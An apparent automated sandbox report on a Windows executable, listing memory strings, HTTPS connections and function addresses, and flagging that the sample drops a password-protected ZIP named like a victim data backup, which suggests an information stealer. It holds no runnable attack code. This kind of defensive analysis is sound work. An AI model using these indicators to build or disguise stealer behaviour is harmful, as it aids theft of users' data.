      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC463000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC431000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC4C3000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1FA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://maps.google.com/maps?hl=en&tab=wl
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1FA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1FD000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://system.data.sqlite.org/
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://system.data.sqlite.org/X
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://urn.to/r/sds_see12https://urn.to/r/sds_see2
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://urn.to/r/sds_see23https://urn.to/r/sds_see1UInnerVerify
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.blogger.com/?tab=wj
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC154000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
      Source: StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB86C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/F
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1FA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/in
      Source: StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB885000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC154000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB8B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC463000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC431000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC4C3000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.newtonsoft.com/json
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
      Source: StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
      Source: StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.sqlite.org/rescode.html
      Source: StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
      Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49724 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49726 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.228:443 -> 192.168.2.6:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49864 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49884 version: TLS 1.2

      System Summary

      barindex
      Drops password protected ZIP file
      Source: Backup_[United States]_8.46.123.189_[1401].zip.0.drZip Entry: encrypted
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943B45100_2_00007FFD943B4510
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9444F5D00_2_00007FFD9444F5D0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944625700_2_00007FFD94462570
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9446DF400_2_00007FFD9446DF40
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944A4FE00_2_00007FFD944A4FE0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944724B00_2_00007FFD944724B0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9448E4A00_2_00007FFD9448E4A0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944694700_2_00007FFD94469470
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944E94900_2_00007FFD944E9490
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943B15300_2_00007FFD943B1530
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943DA5300_2_00007FFD943DA530
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944E15400_2_00007FFD944E1540
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944E05100_2_00007FFD944E0510
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943DF5A00_2_00007FFD943DF5A0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944225A00_2_00007FFD944225A0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944185700_2_00007FFD94418570
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943F45700_2_00007FFD943F4570
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944736300_2_00007FFD94473630
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943D56240_2_00007FFD943D5624
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9441C6500_2_00007FFD9441C650
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944965F00_2_00007FFD944965F0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944536120_2_00007FFD94453612
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943BA6100_2_00007FFD943BA610
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944196B00_2_00007FFD944196B0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9446B6B00_2_00007FFD9446B6B0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944C86B00_2_00007FFD944C86B0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944246C00_2_00007FFD944246C0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943F76600_2_00007FFD943F7660
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9443B6600_2_00007FFD9443B660
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944766900_2_00007FFD94476690
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943BA7460_2_00007FFD943BA746
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9443D6E00_2_00007FFD9443D6E0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944336E00_2_00007FFD944336E0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9440A7A00_2_00007FFD9440A7A0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9449B7D00_2_00007FFD9449B7D0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9443E7700_2_00007FFD9443E770
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944747700_2_00007FFD94474770
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9441B7600_2_00007FFD9441B760
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944E88300_2_00007FFD944E8830
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943FD8300_2_00007FFD943FD830
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944297F00_2_00007FFD944297F0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944A57F00_2_00007FFD944A57F0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943DA7F00_2_00007FFD943DA7F0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943DD7F00_2_00007FFD943DD7F0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944858100_2_00007FFD94485810
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9446D8100_2_00007FFD9446D810
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943FE8100_2_00007FFD943FE810
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943B70B00_2_00007FFD943B70B0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944200D00_2_00007FFD944200D0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944BD0D00_2_00007FFD944BD0D0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943F91200_2_00007FFD943F9120
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943F41300_2_00007FFD943F4130
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944441400_2_00007FFD94444140
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944960E00_2_00007FFD944960E0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9440C1000_2_00007FFD9440C100
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943C81A00_2_00007FFD943C81A0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944101C00_2_00007FFD944101C0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9448017B0_2_00007FFD9448017B
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9448D1900_2_00007FFD9448D190
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9443C2200_2_00007FFD9443C220
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9441E1E00_2_00007FFD9441E1E0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943F11F00_2_00007FFD943F11F0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944662100_2_00007FFD94466210
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944F12100_2_00007FFD944F1210
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943E02100_2_00007FFD943E0210
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943D32600_2_00007FFD943D3260
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943D53230_2_00007FFD943D5323
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944913200_2_00007FFD94491320
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944363400_2_00007FFD94436340
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944902E00_2_00007FFD944902E0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9449E3B00_2_00007FFD9449E3B0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944AC3A00_2_00007FFD944AC3A0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944243D00_2_00007FFD944243D0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9450F3A80_2_00007FFD9450F3A8
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943C03D00_2_00007FFD943C03D0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944203900_2_00007FFD94420390
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9442C3800_2_00007FFD9442C380
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9440D3800_2_00007FFD9440D380
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944F64300_2_00007FFD944F6430
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944CB4300_2_00007FFD944CB430
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943FF4400_2_00007FFD943FF440
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944BD4400_2_00007FFD944BD440
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943E54500_2_00007FFD943E5450
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943FE3E00_2_00007FFD943FE3E0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943DC3E00_2_00007FFD943DC3E0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944783E00_2_00007FFD944783E0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94480CB00_2_00007FFD94480CB0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94457CB00_2_00007FFD94457CB0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9448ACD00_2_00007FFD9448ACD0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943DDCD00_2_00007FFD943DDCD0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94464C900_2_00007FFD94464C90
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94414CE00_2_00007FFD94414CE0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9444CD0F0_2_00007FFD9444CD0F
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9440FDB00_2_00007FFD9440FDB0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9444CDCA0_2_00007FFD9444CDCA
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944D9DC00_2_00007FFD944D9DC0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94423D700_2_00007FFD94423D70
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9444CD820_2_00007FFD9444CD82
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944E6E300_2_00007FFD944E6E30
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94408E200_2_00007FFD94408E20
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943DBE100_2_00007FFD943DBE10
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943FAEA00_2_00007FFD943FAEA0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943DAE900_2_00007FFD943DAE90
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9442CF200_2_00007FFD9442CF20
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD9442FEF00_2_00007FFD9442FEF0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94405EE00_2_00007FFD94405EE0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943E8EF00_2_00007FFD943E8EF0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94412FD00_2_00007FFD94412FD0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94498F800_2_00007FFD94498F80
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD94453F880_2_00007FFD94453F88
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944820500_2_00007FFD94482050
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943C00100_2_00007FFD943C0010
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD944658B00_2_00007FFD944658B0
      Source: C:\Users\user\Desktop\StL9joVVcT.exeCode function: 0_2_00007FFD943EA8A00_2_00007FFD943EA8A0
